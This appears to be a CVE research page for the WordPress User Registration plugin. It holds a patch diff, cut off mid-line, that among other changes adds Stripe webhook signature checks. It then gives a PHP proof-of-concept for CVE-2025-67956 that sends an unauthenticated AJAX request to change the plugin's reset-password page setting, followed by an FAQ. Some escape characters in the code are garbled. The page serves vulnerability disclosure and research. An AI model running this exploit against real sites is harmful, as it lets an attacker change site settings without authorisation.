+			foreach ($settings as $product => $product_settings) {
+				foreach ($product_settings as $setting_array) {
+					$setting_key = $setting_array[0];
 					$setting_default = $setting_array[1];
-					$value           = get_option( $setting_key, 'NOT_SET' );
+					$value = get_option($setting_key, 'NOT_SET');

 					// Set boolean values for certain settings.
-					if ( isset( $setting_array[2] ) && 'NOT_SET' !== $value && $setting_default !== $value ) {
+					if (isset($setting_array[2]) && 'NOT_SET' !== $value && $setting_default !== $value) {
 						$value = 1;
 					}

-					if ( 'NOT_SET' !== $value || $send_all ) {
-						$setting_content = array(
-							'value' => $value //phpcs:ignore
+					if ('NOT_SET' !== $value || $send_all) {
+						$global_settings[] = array(
+							'type' => 'global',
+							'setting_key' => $setting_key,
+							'setting_value' => is_array($value) ? json_encode($value) : $value, //phpcs:ignore
+							'default_value' => $setting_default
 						);
-
-						if ( $send_default ) {
-							$setting_content['default'] = $setting_default;
-						}
-
-						$global_settings[ $product ][ $setting_key ] = $setting_content;
 					}
 				}
 			}
@@ -299,8 +314,9 @@
 		 *
 		 * @return boolean
 		 */
-		public function is_usage_allowed() {
-			return ur_option_checked( 'user_registration_allow_usage_tracking', false );
+		public function is_usage_allowed()
+		{
+			return ur_option_checked('user_registration_allow_usage_tracking', false);
 		}

 		/**
@@ -308,9 +324,10 @@
 		 *
 		 * @return void
 		 */
-		public function init_usage() {
-			if ( wp_doing_cron() ) {
-				add_action( 'user_registration_usage_stats_scheduled_events', array( $this, 'process' ) );
+		public function init_usage()
+		{
+			if (wp_doing_cron()) {
+				add_action('user_registration_usage_stats_scheduled_events', array($this, 'process'));
 			}
 		}

@@ -323,8 +340,9 @@
 		 *
 		 * @return mixed
 		 */
-		public function run_on_save( $old_value, $value, $option ) {
-			if ( $value !== $old_value && $value && ( false === get_option( self::LAST_RUN_STAMP ) ) ) {
+		public function run_on_save($old_value, $value, $option)
+		{
+			if ($value !== $old_value && $value && (false === get_option(self::LAST_RUN_STAMP))) {
 				$this->process();
 			}

@@ -336,25 +354,26 @@
 		 *
 		 * @return void
 		 */
-		public function process() {
+		public function process()
+		{

-			if ( ! $this->is_usage_allowed() ) {
+			if (!$this->is_usage_allowed()) {
 				return;
 			}

-			$last_send = get_option( self::LAST_RUN_STAMP );
+			$last_send = get_option(self::LAST_RUN_STAMP);

 			// Make sure we do not run it more than once on each 15 days.
 			if (
 				false !== $last_send &&
-				( time() - $last_send ) < ( DAY_IN_SECONDS * 14 )
+				(time() - $last_send) < (DAY_IN_SECONDS * 14)
 			) {
 				return;
 			}

 			$this->call_api();
 			// Update the last run option to the current timestamp.
-			update_option( self::LAST_RUN_STAMP, time() );
+			update_option(self::LAST_RUN_STAMP, time());
 		}

 		/**
@@ -363,18 +382,9 @@
 		 * @return string
 		 * @since 4.3.0
 		 */
-		private function get_stats_api_url() {
-			$url = '';
-			// Ingore for development mode.
-			if ( defined( 'UR_DEV' ) && UR_DEV ) {
-				if ( defined( 'TG_USERS_TRACKING_VERSION' ) ) {
-					$url = rest_url() . 'tracking/log';
-				}
-			} else {
-				$url = self::REMOTE_URL;
-			}
-
-			return $url;
+		private function get_stats_api_url()
+		{
+			return self::REMOTE_URL . (defined('UR_DEV') && UR_DEV) ?  'dev/log': 'tracking/log';
 		}

 		/**
@@ -382,14 +392,15 @@
 		 *
 		 * @return array
 		 */
-		public function get_form_settings() {
+		public function get_form_settings()
+		{
 			$form_settings = array();
-			$forms         = ur_get_all_user_registration_form();
+			$forms = ur_get_all_user_registration_form();

-			if ( ! empty( $forms ) ) {
-				foreach ( $forms as $form_id => $form ) {
-					$form_specific_settings    = $this->get_form_specific_settings( $form_id );
-					$form_settings[ $form_id ] = $form_specific_settings;
+			if (!empty($forms)) {
+				foreach ($forms as $form_id => $form) {
+					$form_specific_settings = $this->get_form_specific_settings($form_id);
+					$form_settings = array_merge($form_settings, $form_specific_settings);
 				}
 			}

@@ -405,24 +416,34 @@
 		 *
 		 * @return array
 		 */
-		private function get_form_specific_settings( $form_id ) {
+		private function get_form_specific_settings($form_id)
+		{

-			$form_settings = ur_admin_form_settings_fields( $form_id );
+			$form_settings = ur_admin_form_settings_fields($form_id);
+			$settings = array();

-			if ( ! empty( $form_settings ) ) {
-				foreach ( $form_settings as $setting ) {
+			if (!empty($form_settings)) {
+				foreach ($form_settings as $setting) {

 					$setting_id = $setting['id'];

-					$product                = ! empty( $setting['product'] ) ? $setting['product'] : '';
-					$value                  = get_post_meta( $form_id, $setting_id, true );
-					$settings_value         = empty( $value ) ? 'NOT_SET' : get_post_meta( $form_id, $setting_id, true );
-					$default_value          = ! empty( $setting['default_value'] ) ? $setting['default_value'] : '';
-					$settings_default_value = is_bool( $default_value ) ? ur_bool_to_string( $default_value ) : $default_value;
-
-					$settings[ $product ][ $setting_id ] = array(
-						'settings_value' => strpos( "$settings_value", '<br>' ) > 0 ? preg_replace( '#<s*brs*/?s*>#i', ' ', $settings_value ) : $settings_value,
-						'default_value'  => strpos( "$settings_default_value", '<br>' ) > 0 ? preg_replace( '#<s*brs*/?s*>#i', ' ', $settings_default_value ) : $settings_default_value
+					$product = !empty($setting['product']) ? explode('/', $setting['product'])[0] : '';
+
+					$value = get_post_meta($form_id, $setting_id, true);
+					$settings_value = empty($value) ? 'NOT_SET' : get_post_meta($form_id, $setting_id, true);
+					$default_value = !empty($setting['default_value']) ? $setting['default_value'] : '';
+					$settings_default_value = is_bool($default_value) ? ur_bool_to_string($default_value) : $default_value;
+
+					// Convert arrays and other non-scalar values to JSON strings to avoid array to string conversion warnings
+					$settings_value_str = is_scalar($settings_value) ? (string)$settings_value : wp_json_encode($settings_value);
+					$settings_default_value_str = is_scalar($settings_default_value) ? (string)$settings_default_value : wp_json_encode($settings_default_value);
+
+					$settings[] = array(
+						'type' => 'form',
+						'setting_key' => $setting_id,
+						'setting_value' => strpos($settings_value_str, '<br>') !== false ? preg_replace('#<s*brs*/?s*>#i', ' ', $settings_value_str) : $settings_value_str,
+						'default_value' => strpos($settings_default_value_str, '<br>') !== false ? preg_replace('#<s*brs*/?s*>#i', ' ', $settings_default_value_str) : $settings_default_value_str,
+						'form_id' => $form_id
 					);
 				}
 			}
@@ -435,37 +456,43 @@
 		 *
 		 * @return void
 		 */
-		public function call_api() {
+		public function call_api()
+		{
 			global $wpdb;
-			ur_get_logger()->debug('------------- TG SDK API log tracking initiated -------------', array('source'=> 'urm-tg-sdk-logs'));
+			ur_get_logger()->debug('------------- TG SDK API log tracking initiated -------------', array('source' => 'urm-tg-sdk-logs'));

 			$stats_api_url = $this->get_stats_api_url();

-			if ( '' === $stats_api_url ) {
+			if ('' === $stats_api_url) {
 				return;
 			}
-			$data         = $this->get_base_info();
+			$data = $this->get_base_info();
+			$popup_count = 0;
+			if (class_exists('UR_Stats_Helpers')) {
+				$popup_count = UR_Stats_Helpers::get_popup_stats();
+			}
+
 			$data['data'] = array(
-				'product_info'     => $this->get_plugin_lists(),
-				'admin_email'      => get_bloginfo( 'admin_email' ),
-				'website_url'      => get_bloginfo( 'url' ),
-				'php_version'      => phpversion(),
-				'mysql_version'    => $wpdb->db_version(),
-				'server_software'  => ( isset( $_SERVER['SERVER_SOFTWARE'] ) ? sanitize_text_field( wp_unslash( $_SERVER['SERVER_SOFTWARE'] ) ) : '' ),
-				'is_ssl'           => is_ssl(),
-				'is_multisite'     => is_multisite(),
-				'is_wp_com'        => defined( 'IS_WPCOM' ) && IS_WPCOM,
-				'is_wp_com_vip'    => ( defined( 'WPCOM_IS_VIP_ENV' ) && WPCOM_IS_VIP_ENV ) || ( function_exists( 'wpcom_is_vip' ) && wpcom_is_vip() ),
-				'is_wp_cache'      => defined( 'WP_CACHE' ) && WP_CACHE,
+				'registration_type' => get_option('urm_initial_registration_type', ''),
+				'admin_email' => get_bloginfo('admin_email'),
+				'website_url' => get_bloginfo('url'),
+				'php_version' => phpversion(),
+				'mysql_version' => $wpdb->db_version(),
+				'server_software' => (isset($_SERVER['SERVER_SOFTWARE']) ? sanitize_text_field(wp_unslash($_SERVER['SERVER_SOFTWARE'])) : ''),
+				'is_ssl' => is_ssl(),
+				'is_multisite' => is_multisite(),
+				'is_wp_com' => defined('IS_WPCOM') && IS_WPCOM,
+				'is_wp_com_vip' => (defined('WPCOM_IS_VIP_ENV') && WPCOM_IS_VIP_ENV) || (function_exists('wpcom_is_vip') && wpcom_is_vip()),
+				'is_wp_cache' => defined('WP_CACHE') && WP_CACHE,
 				'multi_site_count' => $this->get_sites_total(),
-				'timezone'         => $this->get_timezone_offset(),
-				'base_product'     => $this->get_base_product(),
-				'global_settings'  => $this->get_global_settings(),
-				'form_settings'    => $this->get_form_settings(),
+				'timezone' => $this->get_timezone_offset(),
+				'total_popup_count' => $popup_count,
+				'base_product' => $this->get_base_product(),
+				'product_info' => $this->get_plugin_lists(),
+				'settings' => array_merge($this->get_global_settings(), $this->get_form_settings()),
 			);

-
-			$this->send_request( apply_filters( 'user_registration_tg_tracking_remote_url', $stats_api_url ), $data );
+			$this->send_request(apply_filters('user_registration_tg_tracking_remote_url', $stats_api_url), $data);
 		}

 		/**
@@ -473,18 +500,20 @@
 		 *
 		 * @return int
 		 */
-		private function get_sites_total() {
+		private function get_sites_total()
+		{

-			return function_exists( 'get_blog_count' ) ? (int) get_blog_count() : 1;
+			return function_exists('get_blog_count') ? (int)get_blog_count() : 1;
 		}

 		/**
 		 * Get Timezone Offset.
 		 */
-		private function get_timezone_offset() {
+		private function get_timezone_offset()
+		{

 			// It was added in WordPress 5.3.
-			if ( function_exists( 'wp_timezone_string' ) ) {
+			if (function_exists('wp_timezone_string')) {
 				return wp_timezone_string();
 			}

@@ -492,20 +521,20 @@
 			 * The code below is basically a copy-paste from that function.
 			 */

-			$timezone_string = get_option( 'timezone_string' );
+			$timezone_string = get_option('timezone_string');

-			if ( $timezone_string ) {
+			if ($timezone_string) {
 				return $timezone_string;
 			}

-			$offset  = (float) get_option( 'gmt_offset' );
-			$hours   = (int) $offset;
-			$minutes = ( $offset - $hours );
-
-			$sign      = ( $offset < 0 ) ? '-' : '+';
-			$abs_hour  = abs( $hours );
-			$abs_mins  = abs( $minutes * 60 );
-			$tz_offset = sprintf( '%s%02d:%02d', $sign, $abs_hour, $abs_mins );
+			$offset = (float)get_option('gmt_offset');
+			$hours = (int)$offset;
+			$minutes = ($offset - $hours);
+
+			$sign = ($offset < 0) ? '-' : '+';
+			$abs_hour = abs($hours);
+			$abs_mins = abs($minutes * 60);
+			$tz_offset = sprintf('%s%02d:%02d', $sign, $abs_hour, $abs_mins);

 			return $tz_offset;
 		}
@@ -516,23 +545,25 @@
 		 * @param string $url URL.
 		 * @param array $data Data.
 		 */
-		public function send_request( $url, $data ) {
-			$headers  = array( 'Content-Type' => 'application/json', 'User-Agent' => 'ThemeGrillSDK' );
+		public function send_request($url, $data)
+		{
+			$headers = array('Content-Type' => 'application/json', 'User-Agent' => 'ThemeGrillSDK');
 			$response = wp_remote_post(
 				$url,
 				array(
-					'method'      => 'POST',
-					'timeout'     => 45,
+					'method' => 'POST',
+					'timeout' => 45,
 					'redirection' => 5,
 					'httpversion' => '1.0',
-					'blocking'    => true,
-					'headers'     => $headers,
-					'body'        => wp_json_encode( $data ),
+					'blocking' => true,
+					'headers' => $headers,
+					'body' => wp_json_encode($data),
 				)
 			);
-			ur_get_logger()->notice(json_decode( wp_remote_retrieve_body( $response ), true ), array('source'=> 'urm-tg-sdk-logs'));
-			ur_get_logger()->debug('------------- TG SDK API log tracking response received -------------', array('source'=> 'urm-tg-sdk-logs'));
-			return json_decode( wp_remote_retrieve_body( $response ), true );
+			ur_get_logger()->notice(print_r(json_decode(wp_remote_retrieve_body($response), true), true), array('source' => 'urm-tg-sdk-logs'));
+			ur_get_logger()->debug('------------- TG SDK API log tracking response received -------------', array('source' => 'urm-tg-sdk-logs'));
+
+			return json_decode(wp_remote_retrieve_body($response), true);
 		}

 		/**
@@ -540,113 +571,114 @@
 		 *
 		 * @return array
 		 */
-		private function setting_keys() {
+		private function setting_keys()
+		{
 			return array(
-				'user-registration/user-registration.php'                                                     => array(
+				'user-registration' => array(
 					// General Settings
-					array( 'user_registration_general_setting_disabled_user_roles', '["subscriber"]' ),
-					array( 'user_registration_myaccount_page_id', '', true ),
-					array( 'user_registration_my_account_layout', 'horizontal' ),
-					array( 'user_registration_general_setting_registration_url_options', '', true ),
+					array('user_registration_general_setting_disabled_user_roles', '["subscriber"]'),
+					array('user_registration_myaccount_page_id', '', true),
+					array('user_registration_my_account_layout', 'horizontal'),
+					array('user_registration_general_setting_registration_url_options', '', true),
 					array(
 						'user_registration_general_setting_registration_label',
-						__( 'Not a member yet? Register now.', 'user-registration' )
+						__('Not a member yet? Register now.', 'user-registration')
 					),
-					array( 'user_registration_general_setting_uninstall_option', false ),
-					array( 'user_registration_allow_usage_tracking', false ),
+					array('user_registration_general_setting_uninstall_option', false),
+					array('user_registration_allow_usage_tracking', false),

 					// Login Settings
-					array( 'user_registration_login_option_hide_show_password', false ),
-					array( 'user_registration_ajax_form_submission_on_edit_profile', false ),
-					array( 'user_registration_disable_profile_picture', false ),
+					array('user_registration_login_option_hide_show_password', false),
+					array('user_registration_ajax_form_submission_on_edit_profile', false),
+					array('user_registration_disable_profile_picture', false),
 					array(
 						'user_registration_disable_logout_confirmation',
-						apply_filters( 'user_registration_disable_logout_confirmation_status', true )
+						apply_filters('user_registration_disable_logout_confirmation_status', true)
 					),
-					array( 'user_registration_login_options_form_template', 'default' ),
-					array( 'user_registration_general_setting_login_options_with', 'default' ),
-					array( 'user_registration_login_title', false ),
-					array( 'user_registration_general_setting_login_form_title', __( 'Welcome', 'user-registration' ) ),
-					array( 'user_registration_general_setting_login_form_desc', '' ),
-					array( 'ur_login_ajax_submission', false ),
-					array( 'user_registration_login_options_remember_me', true ),
-					array( 'user_registration_login_options_lost_password', true ),
-					array( 'user_registration_login_options_hide_labels', false ),
-					array( 'user_registration_login_options_enable_recaptcha', false ),
-					array( 'user_registration_login_options_prevent_core_login', false ),
-					array( 'user_registration_login_options_login_redirect_url', '', true ),
-					array( 'user_registration_login_options_configured_captcha_type', 'v2' ),
+					array('user_registration_login_options_form_template', 'default'),
+					array('user_registration_general_setting_login_options_with', 'default'),
+					array('user_registration_login_title', false),
+					array('user_registration_general_setting_login_form_title', __('Welcome', 'user-registration')),
+					array('user_registration_general_setting_login_form_desc', ''),
+					array('ur_login_ajax_submission', false),
+					array('user_registration_login_options_remember_me', true),
+					array('user_registration_login_options_lost_password', true),
+					array('user_registration_login_options_hide_labels', false),
+					array('user_registration_login_options_enable_recaptcha', false),
+					array('user_registration_login_options_prevent_core_login', false),
+					array('user_registration_login_options_login_redirect_url', '', true),
+					array('user_registration_login_options_configured_captcha_type', 'v2'),

 					// Captcha Settings
-					array( 'user_registration_captcha_setting_recaptcha_version', 'v2' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_key', '' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_secret', '' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_key_v3', '' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_secret_v3', '' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_key_hcaptcha', '' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_secret_hcaptcha', '' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_key_cloudflare', '' ),
-					array( 'user_registration_captcha_setting_recaptcha_site_secret_cloudflare', '' ),
-					array( 'user_registration_captcha_setting_invisible_recaptcha_v2', false ),
-					array( 'user_registration_captcha_setting_recaptcha_cloudflare_theme', 'light' ),
+					array('user_registration_captcha_setting_recaptcha_version', 'v2'),
+					array('user_registration_captcha_setting_recaptcha_site_key', ''),
+					array('user_registration_captcha_setting_recaptcha_site_secret', ''),
+					array('user_registration_captcha_setting_recaptcha_site_key_v3', ''),
+					array('user_registration_captcha_setting_recaptcha_site_secret_v3', ''),
+					array('user_registration_captcha_setting_recaptcha_site_key_hcaptcha', ''),
+					array('user_registration_captcha_setting_recaptcha_site_secret_hcaptcha', ''),
+					array('user_registration_captcha_setting_recaptcha_site_key_cloudflare', ''),
+					array('user_registration_captcha_setting_recaptcha_site_secret_cloudflare', ''),
+					array('user_registration_captcha_setting_invisible_recaptcha_v2', false),
+					array('user_registration_captcha_setting_recaptcha_cloudflare_theme', 'light'),

 					// Email Settings
-					array( 'user_registration_email_setting_disable_email', false ),
+					array('user_registration_email_setting_disable_email', false),
 				),
-				'user-registration-pro/user-registration.php'                                                 => array(
-					array( 'user_registration_pro_general_setting_delete_account', 'disable' ),
-					array( 'user_registration_pro_general_setting_login_form', false ),
-					array( 'user_registration_pro_general_setting_prevent_active_login', false ),
-					array( 'user_registration_pro_general_setting_limited_login', '5' ),
-					array( 'user_registration_pro_general_setting_redirect_back_to_previous_page', false ),
-					array( 'user_registration_pro_general_post_submission_settings', '' ),
-					array( 'user_registration_pro_general_setting_post_submission', 'disable' ),
-					array( 'user_registration_pro_role_based_redirection', false ),//phpcs:ignore
-					array( 'user_registration_payment_currency', 'USD' ),
-					array( 'user_registration_content_restriction_enable', true ),
-					array( 'user_registration_content_restriction_allow_to_roles', '["administrator"]' ) //phpcs:ignore
+				'user-registration-pro' => array(
+					array('user_registration_pro_general_setting_delete_account', 'disable'),
+					array('user_registration_pro_general_setting_login_form', false),
+					array('user_registration_pro_general_setting_prevent_active_login', false),
+					array('user_registration_pro_general_setting_limited_login', '5'),
+					array('user_registration_pro_general_setting_redirect_back_to_previous_page', false),
+					array('user_registration_pro_general_post_submission_settings', ''),
+					array('user_registration_pro_general_setting_post_submission', 'disable'),
+					array('user_registration_pro_role_based_redirection', false),//phpcs:ignore
+					array('user_registration_payment_currency', 'USD'),
+					array('user_registration_content_restriction_enable', true),
+					array('user_registration_content_restriction_allow_to_roles', '["administrator"]') //phpcs:ignore
 				),
-				'user-registration-file-upload/user-registration-file-upload.php'                             => array(
-					array( 'user_registration_file_upload_setting_valid_file_type', '["pdf"]' ),
-					array( 'user_registration_file_upload_setting_max_file_size', '1024' ) //phpcs:ignore
+				'user-registration-file-upload' => array(
+					array('user_registration_file_upload_setting_valid_file_type', '["pdf"]'),
+					array('user_registration_file_upload_setting_max_file_size', '1024') //phpcs:ignore
 				),
-				'user-registration-pdf-submission/user-registration-pdf-submission.php'                       => array(
-					array( 'user_registration_pdf_template', 'default' ),
-					array( 'user_registration_pdf_logo_image', '', true ),
-					array( 'user_registration_pdf_setting_header', '' ),
-					array( 'user_registration_pdf_custom_header_text', '', true ),
-					array( 'user_registration_pdf_paper_size', '' ),
-					array( 'user_registration_pdf_orientation', 'portrait' ),
-					array( 'user_registration_pdf_font', '' ),
-					array( 'user_registration_pdf_font_size', '12' ),
-					array( 'user_registration_pdf_font_color', '#000000' ),
-					array( 'user_registration_pdf_background_color', '#ffffff' ),
-					array( 'user_registration_pdf_header_font_color', '#000000' ),
-					array( 'user_registration_pdf_header_background_color', '#ffffff' ),
-					array( 'user_registration_pdf_multiple_column', false ),
-					array( 'user_registration_pdf_rtl', false ),
-					array( 'user_registration_pdf_print_user_default_fields', false ),
-					array( 'user_registration_pdf_hide_empty_fields', false ) //phpcs:ignore
+				'user-registration-pdf-submission' => array(
+					array('user_registration_pdf_template', 'default'),
+					array('user_registration_pdf_logo_image', '', true),
+					array('user_registration_pdf_setting_header', ''),
+					array('user_registration_pdf_custom_header_text', '', true),
+					array('user_registration_pdf_paper_size', ''),
+					array('user_registration_pdf_orientation', 'portrait'),
+					array('user_registration_pdf_font', ''),
+					array('user_registration_pdf_font_size', '12'),
+					array('user_registration_pdf_font_color', '#000000'),
+					array('user_registration_pdf_background_color', '#ffffff'),
+					array('user_registration_pdf_header_font_color', '#000000'),
+					array('user_registration_pdf_header_background_color', '#ffffff'),
+					array('user_registration_pdf_multiple_column', false),
+					array('user_registration_pdf_rtl', false),
+					array('user_registration_pdf_print_user_default_fields', false),
+					array('user_registration_pdf_hide_empty_fields', false) //phpcs:ignore
 				),
-				'user-registration-social-connect/user-registration-social-connect.php'                       => array(
-					array( 'user_registration_social_setting_enable_facebook_connect', '' ),
-					array( 'user_registration_social_setting_enable_twitter_connect', '' ),
-					array( 'user_registration_social_setting_enable_google_connect', '' ),
-					array( 'user_registration_social_setting_enable_linkedin_connect', '' ),
-					array( 'user_registration_social_setting_enable_social_registration', false ),
-					array( 'user_registration_social_setting_display_social_buttons_in_registration', false ),
-					array( 'user_registration_social_setting_default_user_role', 'subscriber' ),
-					array( 'user_registration_social_login_position', 'bottom' ),
-					array( 'user_registration_social_login_template', 'ursc_theme_4' ) //phpcs:ignore
+				'user-registration-social-connect' => array(
+					array('user_registration_social_setting_enable_facebook_connect', ''),
+					array('user_registration_social_setting_enable_twitter_connect', ''),
+					array('user_registration_social_setting_enable_google_connect', ''),
+					array('user_registration_social_setting_enable_linkedin_connect', ''),
+					array('user_registration_social_setting_enable_social_registration', false),
+					array('user_registration_social_setting_display_social_buttons_in_registration', false),
+					array('user_registration_social_setting_default_user_role', 'subscriber'),
+					array('user_registration_social_login_position', 'bottom'),
+					array('user_registration_social_login_template', 'ursc_theme_4') //phpcs:ignore
 				),
-				'user-registration-two-factor-authentication/user-registration-two-factor-authentication.php' => array(
-					array( 'user_registration_tfa_enable_disable', false ),
-					array( 'user_registration_tfa_roles', '["subscriber"]' ),
-					array( 'user_registration_tfa_otp_length', '6' ),
-					array( 'user_registration_tfa_otp_expiry_time', '10' ),
-					array( 'user_registration_tfa_otp_resend_limit', '3' ),
-					array( 'user_registration_tfa_incorrect_otp_limit', '5' ),
-					array( 'user_registration_tfa_login_hold_period', '60' ) //phpcs:ignore
+				'user-registration-two-factor-authentication' => array(
+					array('user_registration_tfa_enable_disable', false),
+					array('user_registration_tfa_roles', '["subscriber"]'),
+					array('user_registration_tfa_otp_length', '6'),
+					array('user_registration_tfa_otp_expiry_time', '10'),
+					array('user_registration_tfa_otp_resend_limit', '3'),
+					array('user_registration_tfa_incorrect_otp_limit', '5'),
+					array('user_registration_tfa_login_hold_period', '60') //phpcs:ignore
 				),
 			);
 		}
@@ -658,11 +690,12 @@
 		 *
 		 * @since 4.0
 		 */
-		public function on_module_activate( $slug ) {
-			$our_modules  = $this->get_modules();
-			$module_lists = wp_list_pluck( $our_modules, 'slug' );
+		public function on_module_activate($slug)
+		{
+			$our_modules = $this->get_modules();
+			$module_lists = wp_list_pluck($our_modules, 'slug');

-			if ( ! in_array( $slug, $module_lists, true ) ) {
+			if (!in_array($slug, $module_lists, true)) {
 				return;
 			}

@@ -674,34 +707,36 @@
 		 *
 		 * @since 4.0
 		 */
-		public function get_modules() {
-			$all_modules = file_get_contents( ur()->plugin_path() . '/assets/extensions-json/all-features.json' );
+		public function get_modules()
+		{
+			$all_modules = file_get_contents(ur()->plugin_path() . '/assets/extensions-json/all-features.json');

-			if ( ur_is_json( $all_modules ) ) {
-				$all_modules = json_decode( $all_modules, true );
+			if (ur_is_json($all_modules)) {
+				$all_modules = json_decode($all_modules, true);
 			}

-			return isset( $all_modules['features'] ) ? $all_modules['features'] : array();
+			return isset($all_modules['features']) ? $all_modules['features'] : array();
 		}

 		/**
 		 * @return array
 		 */
-		public function get_base_info() {
-			$data                = array();
-			$theme               = wp_get_theme();
-			$data['site']        = get_bloginfo( 'url' );
-			$data['slug']        = "user-registration";
-			$data['version']     = UR()->version;
-			$data['wp_version']  = get_bloginfo( 'version' );
-			$data['locale']      = get_locale();
-			$data['license']     = $this->get_base_product_license();
+		public function get_base_info()
+		{
+			$data = array();
+			$theme = wp_get_theme();
+			$data['site'] = get_bloginfo('url');
+			$data['slug'] = "user-registration";
+			$data['version'] = UR()->version;
+			$data['wp_version'] = get_bloginfo('version');
+			$data['locale'] = get_locale();
+			$data['license'] = $this->get_base_product_license();
 			$data['environment'] = array(
-				'plugins' => array_values( get_option( 'active_plugins' ) ),
-				'theme'   => array(
-					'name'   => $theme->name,
+				'plugins' => array_values(get_option('active_plugins')),
+				'theme' => array(
+					'name' => $theme->name,
 					'author' => $theme->author,
-					'parent' => $theme->parent() !== false ? $theme->parent()->get( 'Name' ) : $theme->get( 'Name' ),
+					'parent' => $theme->parent() !== false ? $theme->parent()->get('Name') : $theme->get('Name'),
 				)
 			);

--- a/user-registration/modules/membership/includes/Admin/Services/PaymentGatewaysWebhookActions.php
+++ b/user-registration/modules/membership/includes/Admin/Services/PaymentGatewaysWebhookActions.php
@@ -32,7 +32,7 @@
 			register_rest_route( 'user-registration', '/stripe-webhook', [
 				'methods'  => 'POST',
 				'callback' => array( $this, 'handle_stripe_webhook', ),
-				'permission_callback' => '__return_true',
+				'permission_callback' => array( $this, 'verify_stripe_webhook_signature' ),
 			] );
 		} );
 	}
@@ -68,6 +68,53 @@
 		$this->paypal_service->handle_membership_paypal_ipn( $data );
 	}

+	public function verify_stripe_webhook_signature( WP_REST_Request $request ) {
+
+		PaymentGatewayLogging::log_webhook_received(
+			'stripe',
+			'Stripe webhook received, starting signature verification.',
+			array(
+			)
+		);
+
+		$stripe_signature = $request->get_header( 'stripe_signature' );
+
+		$body             = $request->get_body();
+
+		new StripeService();
+		$webhook_secret = apply_filters( 'user_registration_stripe_webhook_secret', get_option( 'user_registration_stripe_webhook_secret', false ) );
+
+		if( empty( $webhook_secret ) ) {
+			PaymentGatewayLogging::log_general(
+				'stripe',
+				'Missing webhook secret, skipping verification.',
+				'notice'
+			);
+			return true;
+		}
+		try {
+			StripeWebho

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67956 - User Registration <= 4.4.6 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2025-67956
 * Unauthenticated AJAX endpoint access in User Registration plugin
 *
 * Usage: php poc.php --url https://target.com --page-id 123
 */

$target_url = ''; // Configure target URL
$page_id = '';    // Configure valid WordPress page ID

// Parse command line arguments
if (php_sapi_name() === 'cli') {
    $options = getopt('', ['url:', 'page-id:']);
    if (isset($options['url'])) {
        $target_url = rtrim($options['url'], '/');
    }
    if (isset($options['page-id'])) {
        $page_id = $options['page-id'];
    }
}

if (empty($target_url) || empty($page_id)) {
    echo "Usage: php poc.php --url https://target.com --page-id 123n";
    echo "The page ID must be a valid WordPress page that exists on the target.n";
    exit(1);
}

// Construct the AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Prepare the exploit payload
$post_data = [
    'action' => 'user_registration_ajax_save_settings',
    'setting_name' => 'user_registration_reset_password_page_id',
    'setting_value' => $page_id
];

echo "[*] Target: $target_urln";
echo "[*] AJAX Endpoint: $ajax_urln";
echo "[*] Attempting unauthenticated access to reset password page setting...n";

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'User-Agent: Atomic Edge Research PoC',
    'X-Requested-With: XMLHttpRequest'
]);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze the response
if ($http_code === 200) {
    $response_data = json_decode($response, true);
    
    if (isset($response_data['success']) && $response_data['success'] === true) {
        echo "[+] SUCCESS: Plugin setting modified without authenticationn";
        echo "[+] The reset password page has been changed to page ID: $page_idn";
        echo "[+] Vulnerability confirmed - CVE-2025-67956 is exploitablen";
    } elseif (isset($response_data['success']) && $response_data['success'] === false) {
        echo "[-] FAILED: Request processed but returned errorn";
        if (isset($response_data['data']['message'])) {
            echo "[-] Error message: " . $response_data['data']['message'] . "n";
        }
        echo "[-] This may indicate the page ID is invalid or the page lacks required shortcoden";
    } else {
        echo "[-] UNKNOWN: Received unexpected response formatn";
        echo "[-] Raw response: " . substr($response, 0, 500) . "n";
    }
} else {
    echo "[-] FAILED: HTTP $http_code receivedn";
    echo "[-] The target may be patched or unreachablen";
}

echo "n[*] Proof of Concept completen";
?>

Frequently Asked Questions

What is CVE-2025-67956?
Overview of the vulnerability
CVE-2025-67956 is a medium severity vulnerability in the User Registration plugin for WordPress, affecting versions up to and including 4.4.6. It is caused by a missing authorization check in the AJAX request handling, allowing unauthenticated users to perform unauthorized actions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a specially crafted POST request to the plugin’s AJAX endpoint without authentication. By specifying the `action` parameter as `user_registration_ajax_save_settings`, they can modify plugin settings, such as the reset password page ID, without proper authorization.
